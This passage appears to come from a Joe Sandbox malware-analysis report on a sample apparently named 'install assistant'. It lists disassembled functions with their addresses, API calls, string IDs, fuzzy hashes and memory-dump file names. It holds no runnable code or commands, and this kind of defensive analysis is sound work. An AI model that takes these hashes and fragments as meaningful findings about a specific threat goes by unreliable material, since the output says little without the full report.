                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 5B014472C1116DAFCF019FA88C019EE7FB5BF18214F154165F918E2550E731CA25DF91
                              Function 6C9349C7 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C934685,?,?,00000000,?,6C934685,00000000,0000000C), ref: 6C9349E4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: fa943e3e05c703937325169865cd4326a4bea7cf3002bdc7f8ec76cc543fd0c9
                              • Instruction ID: 0a532e60b825100aac7d2a23c8f7ba75c3a0584a1cbc72f31510f49efb136528
                              • Opcode Fuzzy Hash: fa943e3e05c703937325169865cd4326a4bea7cf3002bdc7f8ec76cc543fd0c9
                              • Instruction Fuzzy Hash: D8D06C3210010DBBDF029E84DC06EDA3BAAFB48714F128000BA5896020C732E861AB90
                              Function 6C7E7CB0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: 5fe8300c8ed5e433bdef45a7f4a9467d10ab972675ab75f6afde86340aac0c95
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:

                              Non-executed Functions

                              Function 6C9A84AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C9A84B1
                                • Part of subcall function 6C9A993B: __EH_prolog.LIBCMT ref: 6C9A9940
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 26e8dd010756dba6b688ed09cca013d02652f4499045f039d78dc6d6bcec3a51
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: 2EF27C30901258DFDB15CBA8C888BDDBBB9BF99308F2444D9E449AB751DB71DA86CF10
                              Function 6C99AEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C99AEF4
                                • Part of subcall function 6C99E622: __EH_prolog.LIBCMT ref: 6C99E627
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: 757838c091e943d9c38023c4c8fde10d37a0d436b16236bd4ad3bf9b46539b21
                              • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction Fuzzy Hash: 15537A30901259DFDB25CBA4C994BEDBBB8AF29308F1840D8D449A7791DB34EE89CF51
                              Function 6C9AC7F3 Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1546COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: 7f71a029219922d3c82a72671d3cf8ed005546dc3f5aed8aeca5db9c06f3b9f5
                              • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction Fuzzy Hash: 59E2F071905289DFEF05CFE8C488BDDBBB8AF15308F248089E855AB781CB75D946CB61
                              Function 6C976CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C976CE5
                                • Part of subcall function 6C94CC2A: __EH_prolog.LIBCMT ref: 6C94CC2F
                                • Part of subcall function 6C94E6A6: __EH_prolog.LIBCMT ref: 6C94E6AB
                                • Part of subcall function 6C976A0E: __EH_prolog.LIBCMT ref: 6C976A13
                                • Part of subcall function 6C976837: __EH_prolog.LIBCMT ref: 6C97683C
                                • Part of subcall function 6C97A143: __EH_prolog.LIBCMT ref: 6C97A148
                                • Part of subcall function 6C97A143: ctype.LIBCPMT ref: 6C97A16C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: e025b51bcc59ab6a3e43a2b105c04059d336d5a703c3217d9de2723d0bd53c91
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: CA03BD30806288DEDF26CFA4C984BDCBBB5AF35308F2480D9D44567A91DB74DB89DB61
                              Function 6C9CC580 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction ID: 069f92992e1d8763ad64554d3bc8772e0c8539f0d84617b5aebc3c60a04d4d7d
                              • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction Fuzzy Hash: CE41E872F10A601AF3488E7A8C855667FC3CBCD346B4AC23DD565C76D9DABDC40782A4
                              Function 6C9A0A52 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1212COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction ID: 68fb12527c217bbc874afa8bf5a9f8e42c36453e8a4eef52f25ecbf6646cc53f
                              • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction Fuzzy Hash: C5B27C74A05299DFDB01CFE8C588B9DBBB8AF4A308F244099E846EB751C775DD42CB60
                              Function 6C994896 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 333COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C99489B
                                • Part of subcall function 6C995FC9: __EH_prolog.LIBCMT ref: 6C995FCE
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction ID: a7ee7c3241415aed2f086ad8ef9062760a387b7ddff6824aaf06819b02cf7bab
                              • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction Fuzzy Hash: B8D1CF31D012058FDB16CFA5C8907EEB7BABF94318F18816AE425ABA84DB70D885CF55
                              Function 6C948EA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: x=J
                              • API String ID: 3519838083-1497497802
                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction ID: c96105a6aebfb1d9b64edc42d3120d857faa995dceb84390473af78f1363d184
                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction Fuzzy Hash: A791E231D01109DBCF08DFA4C990AEDB7B9BF2930CF21C16AD452A7A51DB32DA49CB94
                              Function 6C9B2521 Relevance: 2.6, APIs: 1, Instructions: 1105COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction ID: dc7e0ad8811862e9f9ec9d219121b5043a2d682fe088985020abff71abc8db5d
                              • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction Fuzzy Hash: 21B29930904A59EFDB21CFA9C584B9FBBB5FF15308F104599D49AABA81DB30E985CF10
                              Function 6C948972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @4J$DsL
                              • API String ID: 0-2004129199
                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction ID: 63996e8bef8fee89974c3587c0378bfbdafdb976cab52d6638f85c0ee157398e
                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction Fuzzy Hash: 5F2171376A4D564BD74CCA68DC33EB92681E748305B89527EE94BCB7D1DF5DC800C648
                              Function 6C997D43 Relevance: 1.8, APIs: 1, Instructions: 346COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction ID: de4e61721b0e7522c1a42a4d7d893aebe60ef91d72bb7bbec4d9b9710a1417f8
                              • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction Fuzzy Hash: 0EF16A70901249DFCB58CFA4C590BEDBBB1BF15308F18806ED409ABB52DB70EA59CB51
                              Function 6C9E5D90 Relevance: 1.8, Strings: 1, Instructions: 513COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction ID: 11dcff5eebcb820174b298795a9308c76b924393befe86837cc05282828d283a
                              • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction Fuzzy Hash: 613249B1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                              Function 6C9E67C0 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction ID: e7939163b790d693872f038847113df55851aa32d20b283d51962b45db9c8576
                              • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction Fuzzy Hash: 3612F7B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568B86
                              Function 6C950BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aullrem
                              • String ID:
                              • API String ID: 3758378126-0
                              • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                              • Instruction ID: c0fc3a0d6deae0393c68c8cad1cddb81e2a73f449e873d9c41034a3531a66cb8
                              • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                              • Instruction Fuzzy Hash: 5251FB71A043859BD710CF5AC4C02EDFBF6EF79214F14C05DE8C897242D27A999AC760
                              Function 6C9C9E80 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                              • Instruction ID: a0f54009e53fe4713c54cc8178d568bfdd67f363504410b3bc9402964365ed10
                              • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                              • Instruction Fuzzy Hash: F10299316083818BD325CF28C4907AEBBE2AFD9748F144A2DE4D597B51CB75DA49CB83
                              Function 6C9E6999 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                              • Instruction ID: 19ceb45c4d37035028b01a60d3de497f4a8b7b4efa0124a6fa96d8d3e4b2056f
                              • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                              • Instruction Fuzzy Hash: 39D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                              Function 6C94C7CF Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (SL
                              • API String ID: 0-669240678
                              • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                              • Instruction ID: 6a38d261c718f8134845048acbf225b7d463cba6d789c7007e4f40195ae78195
                              • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                              • Instruction Fuzzy Hash: F5518473E208214AD78CCE24DC2177572D2E788310F8BC1B99D8BAB6E6DD78989587D4
                              Function 6C9BAB90 Relevance: .9, Instructions: 940COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                              • Instruction ID: 0a6e48802393948dc473b1e311aa14ae9726d3584afc78a3eaf863928dfc88b6
                              • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                              • Instruction Fuzzy Hash: D7728CB26042178FD748CF18C490269FBE1FF88314B5A46ADD95AEB742DB70E895CBC1
                              Function 6C9C0020 Relevance: .8, Instructions: 762COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                              • Instruction ID: dfbe15ed31eb21fb591859a8cca37dadbe80c57ecbc1a385c9808a67c97c3da1
                              • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                              • Instruction Fuzzy Hash: 86524D71708B858BD318CF29C5907AAB7E2BB95308F149A2DD4DAC7B41DB74F849CB42
                              Function 6C9DA930 Relevance: .7, Instructions: 740COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                              • Instruction ID: ded228576076c32b68fdd10e50189a4e23870a608d0b89bff7ac312e887e2727
                              • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                              • Instruction Fuzzy Hash: 576235B1A08B418FC714CF1AC48061AFBF5BFC8744F258A2EE899A7714DB70E945CB52
                              Function 6C9D8950 Relevance: .7, Instructions: 697COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                              • Instruction ID: 1b01735065467368a2593e7f3cd063743f0e389a68479b1a60c6cb697c4beaf7
                              • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                              • Instruction Fuzzy Hash: 90428071204B068BD328DF69C8907AAB3E2FB94304F058A2EE497D7B95D774F549CB81
                              Function 6C9C3D50 Relevance: .5, Instructions: 547COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
